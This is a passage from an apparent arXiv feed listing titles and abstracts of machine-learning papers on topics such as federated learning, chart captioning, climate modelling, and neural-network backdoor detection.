    Federated continual learning (FCL) learns incremental tasks over time from confidential datasets distributed across clients. This paper focuses on rehearsal-free FCL, which has severe forgetting issues when learning new tasks due to the lack of access to historical task data. To address this issue, we propose Fed-CPrompt based on prompt learning techniques to obtain task-specific prompts in a communication-efficient way. Fed-CPrompt introduces two key components, asynchronous prompt learning, and contrastive continual loss, to handle asynchronous task arrival and heterogeneous data distributions in FCL, respectively. Extensive experiments demonstrate the effectiveness of Fed-CPrompt in achieving SOTA rehearsal-free FCL performance.
    VisText: A Benchmark for Semantically Rich Chart Captioning. (arXiv:2307.05356v1 [cs.CV])
    Captions that describe or explain charts help improve recall and comprehension of the depicted data and provide a more accessible medium for people with visual disabilities. However, current approaches for automatically generating such captions struggle to articulate the perceptual or cognitive features that are the hallmark of charts (e.g., complex trends and patterns). In response, we introduce VisText: a dataset of 12,441 pairs of charts and captions that describe the charts' construction, report key statistics, and identify perceptual and cognitive phenomena. In VisText, a chart is available as three representations: a rasterized image, a backing data table, and a scene graph -- a hierarchical representation of a chart's visual elements akin to a web page's Document Object Model (DOM). To evaluate the impact of VisText, we fine-tune state-of-the-art language models on our chart captioning task and apply prefix-tuning to produce captions that vary the semantic content they convey. Our models generate coherent, semantically rich captions and perform on par with state-of-the-art chart captioning models across machine translation and text generation metrics. Through qualitative analysis, we identify six broad categories of errors that our models make that can inform future work.
    Forming Trees with Treeformers. (arXiv:2207.06960v2 [cs.CL] UPDATED)
    Human language is known to exhibit a nested, hierarchical structure, allowing us to form complex sentences out of smaller pieces. However, many state-of-the-art neural networks models such as Transformers have no explicit hierarchical structure in its architecture -- that is, they don't have an inductive bias toward hierarchical structure. Additionally, Transformers are known to perform poorly on compositional generalization tasks which require such structures. In this paper, we introduce Treeformer, a general-purpose encoder module inspired by the CKY algorithm which learns a composition operator and pooling function to construct hierarchical encodings for phrases and sentences. Our extensive experiments demonstrate the benefits of incorporating hierarchical structure into the Transformer and show significant improvements in compositional generalization as well as in downstream tasks such as machine translation, abstractive summarization, and various natural language understanding tasks.
    Decentralized Federated Learning: Fundamentals, State of the Art, Frameworks, Trends, and Challenges. (arXiv:2211.08413v3 [cs.LG] UPDATED)
    In the last decade, Federated Learning (FL) has gained relevance in training collaborative models without sharing sensitive data. Since its birth, Centralized FL (CFL) has been the most common approach in the literature, where a central entity creates a global model. However, a centralized approach leads to increased latency due to bottlenecks, heightened vulnerability to system failures, and trustworthiness concerns affecting the entity responsible for the global model creation. Decentralized Federated Learning (DFL) emerged to address these concerns by promoting decentralized model aggregation and minimizing reliance on centralized architectures. However, despite the work done in DFL, the literature has not (i) studied the main aspects differentiating DFL and CFL; (ii) analyzed DFL frameworks to create and evaluate new solutions; and (iii) reviewed application scenarios using DFL. Thus, this article identifies and analyzes the main fundamentals of DFL in terms of federation architectures, topologies, communication mechanisms, security approaches, and key performance indicators. Additionally, the paper at hand explores existing mechanisms to optimize critical DFL fundamentals. Then, the most relevant features of the current DFL frameworks are reviewed and compared. After that, it analyzes the most used DFL application scenarios, identifying solutions based on the fundamentals and frameworks previously defined. Finally, the evolution of existing DFL solutions is studied to provide a list of trends, lessons learned, and open challenges.
    DRMC: A Generalist Model with Dynamic Routing for Multi-Center PET Image Synthesis. (arXiv:2307.05249v1 [eess.IV])
    Multi-center positron emission tomography (PET) image synthesis aims at recovering low-dose PET images from multiple different centers. The generalizability of existing methods can still be suboptimal for a multi-center study due to domain shifts, which result from non-identical data distribution among centers with different imaging systems/protocols. While some approaches address domain shifts by training specialized models for each center, they are parameter inefficient and do not well exploit the shared knowledge across centers. To address this, we develop a generalist model that shares architecture and parameters across centers to utilize the shared knowledge. However, the generalist model can suffer from the center interference issue, \textit{i.e.} the gradient directions of different centers can be inconsistent or even opposite owing to the non-identical data distribution. To mitigate such interference, we introduce a novel dynamic routing strategy with cross-layer connections that routes data from different centers to different experts. Experiments show that our generalist model with dynamic routing (DRMC) exhibits excellent generalizability across centers. Code and data are available at: https://github.com/Yaziwel/Multi-Center-PET-Image-Synthesis.
    Combating Data Imbalances in Federated Semi-supervised Learning with Dual Regulators. (arXiv:2307.05358v1 [cs.LG])
    Federated learning has become a popular method to learn from decentralized heterogeneous data. Federated semi-supervised learning (FSSL) emerges to train models from a small fraction of labeled data due to label scarcity on decentralized clients. Existing FSSL methods assume independent and identically distributed (IID) labeled data across clients and consistent class distribution between labeled and unlabeled data within a client. This work studies a more practical and challenging scenario of FSSL, where data distribution is different not only across clients but also within a client between labeled and unlabeled data. To address this challenge, we propose a novel FSSL framework with dual regulators, FedDure.} FedDure lifts the previous assumption with a coarse-grained regulator (C-reg) and a fine-grained regulator (F-reg): C-reg regularizes the updating of the local model by tracking the learning effect on labeled data distribution; F-reg learns an adaptive weighting scheme tailored for unlabeled instances in each client. We further formulate the client model training as bi-level optimization that adaptively optimizes the model in the client with two regulators. Theoretically, we show the convergence guarantee of the dual regulators. Empirically, we demonstrate that FedDure is superior to the existing methods across a wide range of settings, notably by more than 11% on CIFAR-10 and CINIC-10 datasets.
    On the Need for a Language Describing Distribution Shifts: Illustrations on Tabular Datasets. (arXiv:2307.05284v1 [cs.LG])
    Different distribution shifts require different algorithmic and operational interventions. Methodological research must be grounded by the specific shifts they address. Although nascent benchmarks provide a promising empirical foundation, they implicitly focus on covariate shifts, and the validity of empirical findings depends on the type of shift, e.g., previous observations on algorithmic performance can fail to be valid when the $Y|X$ distribution changes. We conduct a thorough investigation of natural shifts in 5 tabular datasets over 86,000 model configurations, and find that $Y|X$-shifts are most prevalent. To encourage researchers to develop a refined language for distribution shifts, we build WhyShift, an empirical testbed of curated real-world shifts where we characterize the type of shift we benchmark performance over. Since $Y|X$-shifts are prevalent in tabular settings, we identify covariate regions that suffer the biggest $Y|X$-shifts and discuss implications for algorithmic and data-based interventions. Our testbed highlights the importance of future research that builds an understanding of how distributions differ.
    Supervised Attention Using Homophily in Graph Neural Networks. (arXiv:2307.05217v1 [cs.LG])
    Graph neural networks have become the standard approach for dealing with learning problems on graphs. Among the different variants of graph neural networks, graph attention networks (GATs) have been applied with great success to different tasks. In the GAT model, each node assigns an importance score to its neighbors using an attention mechanism. However, similar to other graph neural networks, GATs aggregate messages from nodes that belong to different classes, and therefore produce node representations that are not well separated with respect to the different classes, which might hurt their performance. In this work, to alleviate this problem, we propose a new technique that can be incorporated into any graph attention model to encourage higher attention scores between nodes that share the same class label. We evaluate the proposed method on several node classification datasets demonstrating increased performance over standard baseline models.
    Geometric Neural Diffusion Processes. (arXiv:2307.05431v1 [stat.ML])
    Denoising diffusion models have proven to be a flexible and effective paradigm for generative modelling. Their recent extension to infinite dimensional Euclidean spaces has allowed for the modelling of stochastic processes. However, many problems in the natural sciences incorporate symmetries and involve data living in non-Euclidean spaces. In this work, we extend the framework of diffusion models to incorporate a series of geometric priors in infinite-dimension modelling. We do so by a) constructing a noising process which admits, as limiting distribution, a geometric Gaussian process that transforms under the symmetry group of interest, and b) approximating the score with a neural network that is equivariant w.r.t. this group. We show that with these conditions, the generative functional model admits the same symmetry. We demonstrate scalability and capacity of the model, using a novel Langevin-based conditional sampler, to fit complex scalar and vector fields, with Euclidean and spherical codomain, on synthetic and real-world weather data.
    Leveraging an Alignment Set in Tackling Instance-Dependent Label Noise. (arXiv:2307.04868v1 [cs.LG])
    Noisy training labels can hurt model performance. Most approaches that aim to address label noise assume label noise is independent from the input features. In practice, however, label noise is often feature or \textit{instance-dependent}, and therefore biased (i.e., some instances are more likely to be mislabeled than others). E.g., in clinical care, female patients are more likely to be under-diagnosed for cardiovascular disease compared to male patients. Approaches that ignore this dependence can produce models with poor discriminative performance, and in many healthcare settings, can exacerbate issues around health disparities. In light of these limitations, we propose a two-stage approach to learn in the presence instance-dependent label noise. Our approach utilizes \textit{\anchor points}, a small subset of data for which we know the observed and ground truth labels. On several tasks, our approach leads to consistent improvements over the state-of-the-art in discriminative performance (AUROC) while mitigating bias (area under the equalized odds curve, AUEOC). For example, when predicting acute respiratory failure onset on the MIMIC-III dataset, our approach achieves a harmonic mean (AUROC and AUEOC) of 0.84 (SD [standard deviation] 0.01) while that of the next best baseline is 0.81 (SD 0.01). Overall, our approach improves accuracy while mitigating potential bias compared to existing approaches in the presence of instance-dependent label noise.
    PowerFusion: A Tensor Compiler with Explicit Data Movement Description and Instruction-level Graph IR. (arXiv:2307.04995v1 [cs.LG])
    Deep neural networks (DNNs) are of critical use in different domains. To accelerate DNN computation, tensor compilers are proposed to generate efficient code on different domain-specific accelerators. Existing tensor compilers mainly focus on optimizing computation efficiency. However, memory access is becoming a key performance bottleneck because the computational performance of accelerators is increasing much faster than memory performance. The lack of direct description of memory access and data dependence in current tensor compilers' intermediate representation (IR) brings significant challenges to generate memory-efficient code. In this paper, we propose IntelliGen, a tensor compiler that can generate high-performance code for memory-intensive operators by considering both computation and data movement optimizations. IntelliGen represent a DNN program using GIR, which includes primitives indicating its computation, data movement, and parallel strategies. This information will be further composed as an instruction-level dataflow graph to perform holistic optimizations by searching different memory access patterns and computation operations, and generating memory-efficient code on different hardware. We evaluate IntelliGen on NVIDIA GPU, AMD GPU, and Cambricon MLU, showing speedup up to 1.97x, 2.93x, and 16.91x(1.28x, 1.23x, and 2.31x on average), respectively, compared to current most performant frameworks.
    Estimating label quality and errors in semantic segmentation data via any model. (arXiv:2307.05080v1 [cs.LG])
    The labor-intensive annotation process of semantic segmentation datasets is often prone to errors, since humans struggle to label every pixel correctly. We study algorithms to automatically detect such annotation errors, in particular methods to score label quality, such that the images with the lowest scores are least likely to be correctly labeled. This helps prioritize what data to review in order to ensure a high-quality training/evaluation dataset, which is critical in sensitive applications such as medical imaging and autonomous vehicles. Widely applicable, our label quality scores rely on probabilistic predictions from a trained segmentation model -- any model architecture and training procedure can be utilized. Here we study 7 different label quality scoring methods used in conjunction with a DeepLabV3+ or a FPN segmentation model to detect annotation errors in a version of the SYNTHIA dataset. Precision-recall evaluations reveal a score -- the soft-minimum of the model-estimated likelihoods of each pixel's annotated class -- that is particularly effective to identify images that are mislabeled, across multiple types of annotation error.
    FedYolo: Augmenting Federated Learning with Pretrained Transformers. (arXiv:2307.04905v1 [cs.LG])
    The growth and diversity of machine learning applications motivate a rethinking of learning with mobile and edge devices. How can we address diverse client goals and learn with scarce heterogeneous data? While federated learning aims to address these issues, it has challenges hindering a unified solution. Large transformer models have been shown to work across a variety of tasks achieving remarkable few-shot adaptation. This raises the question: Can clients use a single general-purpose model, rather than custom models for each task, while obeying device and network constraints? In this work, we investigate pretrained transformers (PTF) to achieve these on-device learning goals and thoroughly explore the roles of model size and modularity, where the latter refers to adaptation through modules such as prompts or adapters. Focusing on federated learning, we demonstrate that: (1) Larger scale shrinks the accuracy gaps between alternative approaches and improves heterogeneity robustness. Scale allows clients to run more local SGD epochs which can significantly reduce the number of communication rounds. At the extreme, clients can achieve respectable accuracy locally highlighting the potential of fully-local learning. (2) Modularity, by design, enables $>$100$\times$ less communication in bits. Surprisingly, it also boosts the generalization capability of local adaptation methods and the robustness of smaller PTFs. Finally, it enables clients to solve multiple unrelated tasks simultaneously using a single PTF, whereas full updates are prone to catastrophic forgetting. These insights on scale and modularity motivate a new federated learning approach we call "You Only Load Once" (FedYolo): The clients load a full PTF model once and all future updates are accomplished through communication-efficient modules with limited catastrophic-forgetting, where each task is assigned to its own module.
    ClimaX: A foundation model for weather and climate. (arXiv:2301.10343v3 [cs.LG] UPDATED)
    Most state-of-the-art approaches for weather and climate modeling are based on physics-informed numerical models of the atmosphere. These approaches aim to model the non-linear dynamics and complex interactions between multiple variables, which are challenging to approximate. Additionally, many such numerical models are computationally intensive, especially when modeling the atmospheric phenomenon at a fine-grained spatial and temporal resolution. Recent data-driven approaches based on machine learning instead aim to directly solve a downstream forecasting or projection task by learning a data-driven functional mapping using deep neural networks. However, these networks are trained using curated and homogeneous climate datasets for specific spatiotemporal tasks, and thus lack the generality of numerical models. We develop and demonstrate ClimaX, a flexible and generalizable deep learning model for weather and climate science that can be trained using heterogeneous datasets spanning different variables, spatio-temporal coverage, and physical groundings. ClimaX extends the Transformer architecture with novel encoding and aggregation blocks that allow effective use of available compute while maintaining general utility. ClimaX is pre-trained with a self-supervised learning objective on climate datasets derived from CMIP6. The pre-trained ClimaX can then be fine-tuned to address a breadth of climate and weather tasks, including those that involve atmospheric variables and spatio-temporal scales unseen during pretraining. Compared to existing data-driven baselines, we show that this generality in ClimaX results in superior performance on benchmarks for weather forecasting and climate projections, even when pretrained at lower resolutions and compute budgets. The source code is available at https://github.com/microsoft/ClimaX.
    Reject option models comprising out-of-distribution detection. (arXiv:2307.05199v1 [cs.LG])
    The optimal prediction strategy for out-of-distribution (OOD) setups is a fundamental question in machine learning. In this paper, we address this question and present several contributions. We propose three reject option models for OOD setups: the Cost-based model, the Bounded TPR-FPR model, and the Bounded Precision-Recall model. These models extend the standard reject option models used in non-OOD setups and define the notion of an optimal OOD selective classifier. We establish that all the proposed models, despite their different formulations, share a common class of optimal strategies. Motivated by the optimal strategy, we introduce double-score OOD methods that leverage uncertainty scores from two chosen OOD detectors: one focused on OOD/ID discrimination and the other on misclassification detection. The experimental results consistently demonstrate the superior performance of this simple strategy compared to state-of-the-art methods. Additionally, we propose novel evaluation metrics derived from the definition of the optimal strategy under the proposed OOD rejection models. These new metrics provide a comprehensive and reliable assessment of OOD methods without the deficiencies observed in existing evaluation approaches.
    MAP- and MLE-Based Teaching. (arXiv:2307.05252v1 [cs.LG])
    Imagine a learner L who tries to infer a hidden concept from a collection of observations. Building on the work [4] of Ferri et al., we assume the learner to be parameterized by priors P(c) and by c-conditional likelihoods P(z|c) where c ranges over all concepts in a given class C and z ranges over all observations in an observation set Z. L is called a MAP-learner (resp. an MLE-learner) if it thinks of a collection S of observations as a random sample and returns the concept with the maximum a-posteriori probability (resp. the concept which maximizes the c-conditional likelihood of S). Depending on whether L assumes that S is obtained from ordered or unordered sampling resp. from sampling with or without replacement, we can distinguish four different sampling modes. Given a target concept c in C, a teacher for a MAP-learner L aims at finding a smallest collection of observations that causes L to return c. This approach leads in a natural manner to various notions of a MAP- or MLE-teaching dimension of a concept class C. Our main results are: We show that this teaching model has some desirable monotonicity properties. We clarify how the four sampling modes are related to each other. As for the (important!) special case, where concepts are subsets of a domain and observations are 0,1-labeled examples, we obtain some additional results. First of all, we characterize the MAP- and MLE-teaching dimension associated with an optimally parameterized MAP-learner graph-theoretically. From this central result, some other ones are easy to derive. It is shown, for instance, that the MLE-teaching dimension is either equal to the MAP-teaching dimension or exceeds the latter by 1. It is shown furthermore that these dimensions can be bounded from above by the so-called antichain number, the VC-dimension and related combinatorial parameters. Moreover they can be computed in polynomial time.
    Hybrid hidden Markov LSTM for short-term traffic flow prediction. (arXiv:2307.04954v1 [cs.LG])
    Deep learning (DL) methods have outperformed parametric models such as historical average, ARIMA and variants in predicting traffic variables into short and near-short future, that are critical for traffic management. Specifically, recurrent neural network (RNN) and its variants (e.g. long short-term memory) are designed to retain long-term temporal correlations and therefore are suitable for modeling sequences. However, multi-regime models assume the traffic system to evolve through multiple states (say, free-flow, congestion in traffic) with distinct characteristics, and hence, separate models are trained to characterize the traffic dynamics within each regime. For instance, Markov-switching models with a hidden Markov model (HMM) for regime identification is capable of capturing complex dynamic patterns and non-stationarity. Interestingly, both HMM and LSTM can be used for modeling an observation sequence from a set of latent or, hidden state variables. In LSTM, the latent variable is computed in a deterministic manner from the current observation and the previous latent variable, while, in HMM, the set of latent variables is a Markov chain. Inspired by research in natural language processing, a hybrid hidden Markov-LSTM model that is capable of learning complementary features in traffic data is proposed for traffic flow prediction. Results indicate significant performance gains in using hybrid architecture compared to conventional methods such as Markov switching ARIMA and LSTM.
    Measuring and Mitigating Interference in Reinforcement Learning. (arXiv:2307.04887v1 [cs.LG])
    Catastrophic interference is common in many network-based learning systems, and many proposals exist for mitigating it. Before overcoming interference we must understand it better. In this work, we provide a definition and novel measure of interference for value-based reinforcement learning methods such as Fitted Q-Iteration and DQN. We systematically evaluate our measure of interference, showing that it correlates with instability in control performance, across a variety of network architectures. Our new interference measure allows us to ask novel scientific questions about commonly used deep learning architectures and study learning algorithms which mitigate interference. Lastly, we outline a class of algorithms which we call online-aware that are designed to mitigate interference, and show they do reduce interference according to our measure and that they improve stability and performance in several classic control environments.
    Predicting small molecules solubilities on endpoint devices using deep ensemble neural networks. (arXiv:2307.05318v1 [physics.chem-ph])
    Aqueous solubility is a valuable yet challenging property to predict. Computing solubility using first-principles methods requires accounting for the competing effects of entropy and enthalpy, resulting in long computations for relatively poor accuracy. Data-driven approaches, such as deep learning, offer improved accuracy and computational efficiency but typically lack uncertainty quantification. Additionally, ease of use remains a concern for any computational technique, resulting in the sustained popularity of group-based contribution methods. In this work, we addressed these problems with a deep learning model with predictive uncertainty that runs on a static website (without a server). This approach moves computing needs onto the website visitor without requiring installation, removing the need to pay for and maintain servers. Our model achieves satisfactory results in solubility prediction. Furthermore, we demonstrate how to create molecular property prediction models that balance uncertainty and ease of use. The code is available at \url{https://github.com/ur-whitelab/mol.dev}, and the model is usable at \url{https://mol.dev}.
    Compact Twice Fusion Network for Edge Detection. (arXiv:2307.04952v1 [cs.CV])
    The significance of multi-scale features has been gradually recognized by the edge detection community. However, the fusion of multi-scale features increases the complexity of the model, which is not friendly to practical application. In this work, we propose a Compact Twice Fusion Network (CTFN) to fully integrate multi-scale features while maintaining the compactness of the model. CTFN includes two lightweight multi-scale feature fusion modules: a Semantic Enhancement Module (SEM) that can utilize the semantic information contained in coarse-scale features to guide the learning of fine-scale features, and a Pseudo Pixel-level Weighting (PPW) module that aggregate the complementary merits of multi-scale features by assigning weights to all features. Notwithstanding all this, the interference of texture noise makes the correct classification of some pixels still a challenge. For these hard samples, we propose a novel loss function, coined Dynamic Focal Loss, which reshapes the standard cross-entropy loss and dynamically adjusts the weights to correct the distribution of hard samples. We evaluate our method on three datasets, i.e., BSDS500, NYUDv2, and BIPEDv2. Compared with state-of-the-art methods, CTFN achieves competitive accuracy with less parameters and computational cost. Apart from the backbone, CTFN requires only 0.1M additional parameters, which reduces its computation cost to just 60% of other state-of-the-art methods. The codes are available at https://github.com/Li-yachuan/CTFN-pytorch-master.
    Intrinsically motivated graph exploration using network theories of human curiosity. (arXiv:2307.04962v1 [cs.LG])
    Intrinsically motivated exploration has proven useful for reinforcement learning, even without additional extrinsic rewards. When the environment is naturally represented as a graph, how to guide exploration best remains an open question. In this work, we propose a novel approach for exploring graph-structured data motivated by two theories of human curiosity: the information gap theory and the compression progress theory. The theories view curiosity as an intrinsic motivation to optimize for topological features of subgraphs induced by the visited nodes in the environment. We use these proposed features as rewards for graph neural-network-based reinforcement learning. On multiple classes of synthetically generated graphs, we find that trained agents generalize to larger environments and to longer exploratory walks than are seen during training. Our method computes more efficiently than the greedy evaluation of the relevant topological properties. The proposed intrinsic motivations bear particular relevance for recommender systems. We demonstrate that curiosity-based recommendations are more predictive of human behavior than PageRank centrality for several real-world graph datasets, including MovieLens, Amazon Books, and Wikispeedia.
    Empowering recommender systems using automatically generated Knowledge Graphs and Reinforcement Learning. (arXiv:2307.04996v1 [cs.IR])
    Personalized recommendations have a growing importance in direct marketing, which motivates research to enhance customer experiences by knowledge graph (KG) applications. For example, in financial services, companies may benefit from providing relevant financial articles to their customers to cultivate relationships, foster client engagement and promote informed financial decisions. While several approaches center on KG-based recommender systems for improved content, in this study we focus on interpretable KG-based recommender systems for decision making.To this end, we present two knowledge graph-based approaches for personalized article recommendations for a set of customers of a large multinational financial services company. The first approach employs Reinforcement Learning and the second approach uses the XGBoost algorithm for recommending articles to the customers. Both approaches make use of a KG generated from both structured (tabular data) and unstructured data (a large body of text data).Using the Reinforcement Learning-based recommender system we could leverage the graph traversal path leading to the recommendation as a way to generate interpretations (Path Directed Reasoning (PDR)). In the XGBoost-based approach, one can also provide explainable results using post-hoc methods such as SHAP (SHapley Additive exPlanations) and ELI5 (Explain Like I am Five).Importantly, our approach offers explainable results, promoting better decision-making. This study underscores the potential of combining advanced machine learning techniques with KG-driven insights to bolster experience in customer relationship management.
    BayesFlow: Amortized Bayesian Workflows With Neural Networks. (arXiv:2306.16015v2 [cs.LG] UPDATED)
    Modern Bayesian inference involves a mixture of computational techniques for estimating, validating, and drawing conclusions from probabilistic models as part of principled workflows for data analysis. Typical problems in Bayesian workflows are the approximation of intractable posterior distributions for diverse model types and the comparison of competing models of the same process in terms of their complexity and predictive performance. This manuscript introduces the Python library BayesFlow for simulation-based training of established neural network architectures for amortized data compression and inference. Amortized Bayesian inference, as implemented in BayesFlow, enables users to train custom neural networks on model simulations and re-use these networks for any subsequent application of the models. Since the trained networks can perform inference almost instantaneously, the upfront neural network training is quickly amortized.
    Self Expanding Neural Networks. (arXiv:2307.04526v2 [cs.LG] UPDATED)
    The results of training a neural network are heavily dependent on the architecture chosen; and even a modification of only the size of the network, however small, typically involves restarting the training process. In contrast to this, we begin training with a small architecture, only increase its capacity as necessary for the problem, and avoid interfering with previous optimization while doing so. We thereby introduce a natural gradient based approach which intuitively expands both the width and depth of a neural network when this is likely to substantially reduce the hypothetical converged training loss. We prove an upper bound on the "rate" at which neurons are added, and a computationally cheap lower bound on the expansion score. We illustrate the benefits of such Self-Expanding Neural Networks in both classification and regression problems, including those where the appropriate architecture size is substantially uncertain a priori.
    TOAST: Transfer Learning via Attention Steering. (arXiv:2305.15542v2 [cs.CV] UPDATED)
    Transfer learning involves adapting a pre-trained model to novel downstream tasks. However, we observe that current transfer learning methods often fail to focus on task-relevant features. In this work, we explore refocusing model attention for transfer learning. We introduce Top-Down Attention Steering (TOAST), a novel transfer learning algorithm that keeps the pre-trained backbone frozen, selects task-relevant features in the output, and feeds those features back to the model to steer the attention to the task-specific features. By refocusing the attention only, TOAST achieves state-of-the-art results on a number of transfer learning benchmarks, while having a small number of tunable parameters. Compared to fully fine-tuning, LoRA, and prompt tuning, TOAST substantially improves performance across a range of fine-grained visual classification datasets (e.g., 81.1% -> 86.2% on FGVC). TOAST also outperforms the fully fine-tuned Alpaca and Vicuna models on instruction-following language generation. Code is available at https://github.com/bfshi/TOAST.
    Empowering Cross-lingual Behavioral Testing of NLP Models with Typological Features. (arXiv:2307.05454v1 [cs.CL])
    A challenge towards developing NLP systems for the world's languages is understanding how they generalize to typological differences relevant for real-world applications. To this end, we propose M2C, a morphologically-aware framework for behavioral testing of NLP models. We use M2C to generate tests that probe models' behavior in light of specific linguistic features in 12 typologically diverse languages. We evaluate state-of-the-art language models on the generated tests. While models excel at most tests in English, we highlight generalization failures to specific typological characteristics such as temporal expressions in Swahili and compounding possessives in Finish. Our findings motivate the development of models that address these blind spots.
    Smooth Monotonic Networks. (arXiv:2306.01147v2 [cs.LG] UPDATED)
    Monotonicity constraints are powerful regularizers in statistical modelling. They can support fairness in computer supported decision making and increase plausibility in data-driven scientific models. The seminal min-max (MM) neural network architecture ensures monotonicity, but often gets stuck in undesired local optima during training because of vanishing gradients. We propose a simple modification of the MM network using strictly-increasing smooth non-linearities that alleviates this problem. The resulting smooth min-max (SMM) network module inherits the asymptotic approximation properties from the MM architecture. It can be used within larger deep learning systems trained end-to-end. The SMM module is considerably simpler and less computationally demanding than state-of-the-art neural networks for monotonic modelling. Still, in our experiments, it compared favorably to alternative neural and non-neural approaches in terms of generalization performance.
    Comparison of High-Dimensional Bayesian Optimization Algorithms on BBOB. (arXiv:2303.00890v2 [cs.LG] UPDATED)
    Bayesian Optimization (BO) is a class of black-box, surrogate-based heuristics that can efficiently optimize problems that are expensive to evaluate, and hence admit only small evaluation budgets. BO is particularly popular for solving numerical optimization problems in industry, where the evaluation of objective functions often relies on time-consuming simulations or physical experiments. However, many industrial problems depend on a large number of parameters. This poses a challenge for BO algorithms, whose performance is often reported to suffer when the dimension grows beyond 15 variables. Although many new algorithms have been proposed to address this problem, it is not well understood which one is the best for which optimization scenario. In this work, we compare five state-of-the-art high-dimensional BO algorithms, with vanilla BO and CMA-ES on the 24 BBOB functions of the COCO environment at increasing dimensionality, ranging from 10 to 60 variables. Our results confirm the superiority of BO over CMA-ES for limited evaluation budgets and suggest that the most promising approach to improve BO is the use of trust regions. However, we also observe significant performance differences for different function landscapes and budget exploitation phases, indicating improvement potential, e.g., through hybridization of algorithmic components.
    Capafoldable: self-tracking foldable smart textiles with capacitive sensing. (arXiv:2307.05370v1 [cs.HC])
    Folding is an unique structural technique to enable planer materials with motion or 3D mechanical properties. Textile-based capacitive sensing has shown to be sensitive to the geometry deformation and relative motion of conductive textiles. In this work, we propose a novel self-tracking foldable smart textile by combining folded fabric structures and capacitive sensing to detect the structural motions using state-of-the-art sensing circuits and deep learning technologies. We created two folding patterns, Accordion and Chevron, each with two layouts of capacitive sensors in the form of thermobonded conductive textile patches. In an experiment of manually moving patches of the folding patterns, we developed deep neural network to learn and reconstruct the vision-tracked shape of the patches. Through our approach, the geometry primitives defining the patch shape can be reconstructed from the capacitive signals with R-squared value of up to 95\% and tracking error of 1cm for 22.5cm long patches. With mechanical, electrical and sensing properties, Capafoldable could enable a new range of smart textile applications.
    Differential Analysis of Triggers and Benign Features for Black-Box DNN Backdoor Detection. (arXiv:2307.05422v1 [cs.CR])
    This paper proposes a data-efficient detection method for deep neural networks against backdoor attacks under a black-box scenario. The proposed approach is motivated by the intuition that features corresponding to triggers have a higher influence in determining the backdoored network output than any other benign features. To quantitatively measure the effects of triggers and benign features on determining the backdoored network output, we introduce five metrics. To calculate the five-metric values for a given input, we first generate several synthetic samples by injecting the input's partial contents into clean validation samples. Then, the five metrics are computed by using the output labels of the corresponding synthetic samples. One contribution of this work is the use of a tiny clean validation dataset. Having the computed five metrics, five novelty detectors are trained from the validation dataset. A meta novelty detector fuses the output of the five trained novelty detectors to generate a meta confidence score. During online testing, our method determines if online samples are poisoned or not via assessing their meta confidence scores output by the meta novelty detector. We show the efficacy of our methodology through a broad range of backdoor attacks, including ablation studies and comparison to existing approaches. Our methodology is promising since the proposed five metrics quantify the inherent differences between clean and poisoned samples. Additionally, our detection method can be incrementally improved by appending more metrics that may be proposed to address future advanced attacks.
    Selective Sampling and Imitation Learning via Online Regression. (arXiv:2307.04998v1 [cs.LG])
    We consider the problem of Imitation Learning (IL) by actively querying noisy expert for feedback. While imitation learning has been empirically successful, much of prior work assumes access to noiseless expert feedback which is not practical in many applications. In fact, when one only has access to noisy expert feedback, algorithms that rely on purely offline data (non-interactive IL) can be shown to need a prohibitively large number of samples to be successful. In contrast, in this work, we provide an interactive algorithm for IL that uses selective sampling to actively query the noisy expert for feedback. Our contributions are twofold: First, we provide a new selective sampling algorithm that works with general function classes and multiple actions, and obtains the best-known bounds for the regret and the number of queries. Next, we extend this analysis to the problem of IL with noisy expert feedback and provide a new IL algorithm that makes limited queries. Our algorithm for selective sampling leverages function approximation, and relies on an online regression oracle w.r.t.~the given model class to predict actions, and to decide whether to query the expert for its label. On the theoretical side, the regret bound of our algorithm is upper bounded by the regret of the online regression oracle, while the query complexity additionally depends on the eluder dimension of the model class. We complement this with a lower bound that demonstrates that our results are tight. We extend our selective sampling algorithm for IL with general function approximation and provide bounds on both the regret and the number of queries made to the noisy expert. A key novelty here is that our regret and query complexity bounds only depend on the number of times the optimal policy (and not the noisy expert, or the learner) go to states that have a small margin.
    Optimal Algorithms for Latent Bandits with Cluster Structure. (arXiv:2301.07040v3 [cs.LG] UPDATED)
    We consider the problem of latent bandits with cluster structure where there are multiple users, each with an associated multi-armed bandit problem. These users are grouped into \emph{latent} clusters such that the mean reward vectors of users within the same cluster are identical. At each round, a user, selected uniformly at random, pulls an arm and observes a corresponding noisy reward. The goal of the users is to maximize their cumulative rewards. This problem is central to practical recommendation systems and has received wide attention of late \cite{gentile2014online, maillard2014latent}. Now, if each user acts independently, then they would have to explore each arm independently and a regret of $\Omega(\sqrt{\mathsf{MNT}})$ is unavoidable, where $\mathsf{M}, \mathsf{N}$ are the number of arms and users, respectively. Instead, we propose LATTICE (Latent bAndiTs via maTrIx ComplEtion) which allows exploitation of the latent cluster structure to provide the minimax optimal regret of $\widetilde{O}(\sqrt{(\mathsf{M}+\mathsf{N})\mathsf{T}})$, when the number of clusters is $\widetilde{O}(1)$. This is the first algorithm to guarantee such strong regret bound. LATTICE is based on a careful exploitation of arm information within a cluster while simultaneously clustering users. Furthermore, it is computationally efficient and requires only $O(\log{\mathsf{T}})$ calls to an offline matrix completion oracle across all $\mathsf{T}$ rounds.
    CrysMMNet: Multimodal Representation for Crystal Property Prediction. (arXiv:2307.05390v1 [cond-mat.mtrl-sci])
    Machine Learning models have emerged as a powerful tool for fast and accurate prediction of different crystalline properties. Exiting state-of-the-art models rely on a single modality of crystal data i.e. crystal graph structure, where they construct multi-graph by establishing edges between nearby atoms in 3D space and apply GNN to learn materials representation. Thereby, they encode local chemical semantics around the atoms successfully but fail to capture important global periodic structural information like space group number, crystal symmetry, rotational information, etc, which influence different crystal properties. In this work, we leverage textual descriptions of materials to model global structural information into graph structure and learn a more robust and enriched representation of crystalline materials. To this effect, we first curate a textual dataset for crystalline material databases containing descriptions of each material. Further, we propose CrysMMNet, a simple multi-modal framework, which fuses both structural and textual representation together to generate a joint multimodal representation of crystalline materials. We conduct extensive experiments on two benchmark datasets across ten different properties to show that CrysMMNet outperforms existing state-of-the-art baseline methods with a good margin. We also observe that fusing the textual representation with crystal graph structure provides consistent improvement for all the SOTA GNN models compared to their own vanilla versions. We have shared the textual dataset, that we have curated for both the benchmark material databases, with the community for future use.
    To Raise or Not To Raise: The Autonomous Learning Rate Question. (arXiv:2106.08767v3 [cs.LG] UPDATED)
